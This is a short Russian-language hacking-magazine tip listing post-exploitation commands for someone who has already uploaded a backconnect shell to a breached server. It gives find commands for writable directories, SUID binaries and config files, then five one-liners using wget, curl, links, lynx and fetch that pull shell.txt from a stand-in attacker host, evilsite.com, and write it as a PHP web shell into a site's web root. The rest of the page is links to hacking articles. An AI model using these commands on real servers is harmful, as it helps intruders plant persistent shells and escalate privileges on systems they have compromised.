Выделить наиболее полезные команды для багоискателя после заливки самопального backconnect-шелла

1. Поиск
директорий, доступных на запись,
относительно текущей

find . -perm -2 -type d -ls

2. Поиск файлов с
установленным SUID-битом

find / -type f -perm -04000 -ls

3. Поиск конфигурационных
файлов

find / -type f -name "config*"

4. Поиск так называемых
качалок

which wget; which curl; which lynx; which links; which fetch

5. Качалка wget

wget http://evilsite.com/shell.txt -O /home/user/www/shell.php

6. Качалка curl

curl http://evilsite.com/shell.txt -o /home/user/www/shell.php

7. Качалка links

links -source http://evilsite.com/shell.txt > /home/user/www/shell.php

8. Качалка lynx

lynx -source http://evilsite.com/shell.txt > /home/user/www/shell.php

9. Качалка fetch

fetch -o http://evilsite.com/shell.txt -p /home/user/www/shell.php

← Ранее Как сделать полноценный прокси-сервер из залитого шелла на уязвимой машине

Далее → У FIFA украдены данные покупателей билетов

Далее по этой теме
Ранее по этой теме

Knocked-Out AOL: How The AOL Servers Were Hacked

AOL Corporation has always been a kind of honey pie for all possible kinds of hackers. Mi…

02.11.2010
50 мин на чтение
Сумасшедшие идеи настоящих гиков: использование стандартных утилит для решения нестандартных задач

Приверженцы UNIX-систем не просто пользователи, это люди с пытливым умом, любовью к велоси…

11.11.2010
18 мин на чтение
Молотком по Битриксу: выявляем 0day-уязвимости популярной CMS

Около года назад я нашел XSS-уязвимость в продукте 1С-Битрикс, которую показал в ролике х…

21.09.2010
16 мин на чтение
Поднятая целина: Осваиваем и обустраиваем консоль

Настроенный по дефолту терминал — унылое зрелище, отпугивающее новичков и наводящее тоску …

25.07.2011
16 мин на чтение
Easy Hack

Firewall’ы относятся к основным средствам защиты при работе в сети. Сейчас они используютс…

03.11.2010
18 мин на чтение
Обзор эксплойтов

Приветствую тебя, читатель! Вот мы и снова встретились на страницах ][. Сегодняшний обзор …

10.04.2011
34 мин на чтение

Как настроить крон для постоянного наличия файла на сервере

Допустим, ты взломал сайт и очень хочешь, чтобы там остался твой шелл/фр…

08.09.2010
5 мин на чтение
GOV sites are on the spot: hacking the web site of Ministry of Education and Science of Ukraine

Lately, I see more and more vulnerable government web sites. And the reason is banal: gov…

17.08.2010
37 мин на чтение
Starry Twitter: Hacking the Stephen Fry account

Watching the feeds, one’s can often face the news that another Twitter account of some Br…

24.12.2009
39 мин на чтение
Backstreet`s Back: total destruction of the Backstreet Boys band

Salute, my dear admirer of the Backstreet Boys band! Today I will tell you an interesting…

05.02.2010
52 мин на чтение
GOV сайты под угрозой: взлом сайта Министерства образования и науки Украины

В последнее время мне все чаще попадаются уязвимые государственные сайты. А причина банал…

13.05.2010
11 мин на чтение
Звездный Twitter: взлом аккаунта Стивена Фрая

В лентах новостей зачастую можно прочесть о том, что в очередной раз на Твиттере взломан …

21.10.2009
13 мин на чтение

Выделить наиболее полезные команды для багоискателя после заливки самопального backconnect-шелла

Knocked-Out AOL: How The AOL Servers Were Hacked

Сумасшедшие идеи настоящих гиков: использование стандартных утилит для решения нестандартных задач

Молотком по Битриксу: выявляем 0day-уязвимости популярной CMS

Поднятая целина: Осваиваем и обустраиваем консоль

Easy Hack

Обзор эксплойтов

Как настроить крон для постоянного наличия файла на сервере

GOV sites are on the spot: hacking the web site of Ministry of Education and Science of Ukraine

Starry Twitter: Hacking the Stephen Fry account

Backstreet`s Back: total destruction of the Backstreet Boys band

GOV сайты под угрозой: взлом сайта Министерства образования и науки Украины

Звездный Twitter: взлом аккаунта Стивена Фрая

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Базовые атаки на AD. Разбираем NTLM Relay и NTDS dumping

Отлом байды. Как устроена защита Android-приложений Baidu

HTB PermX. Закрепляемся в Linux при помощи setfacl

MEGANews. Самые важные события в мире инфосека за октябрь

Трюки

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Последние новости

В Канаде арестован подозреваемый во взломе компании Snowflake

GoblinRAT шпионил за российскими ведомствами три года

Cisco исправляет критическую уязвимость в точках доступа URWB

Пакет из PyPI похитил у разработчиков тысячи ключей AWS

Positive Technologies: треть SIM-карт дают доступ к чужим аккаунтам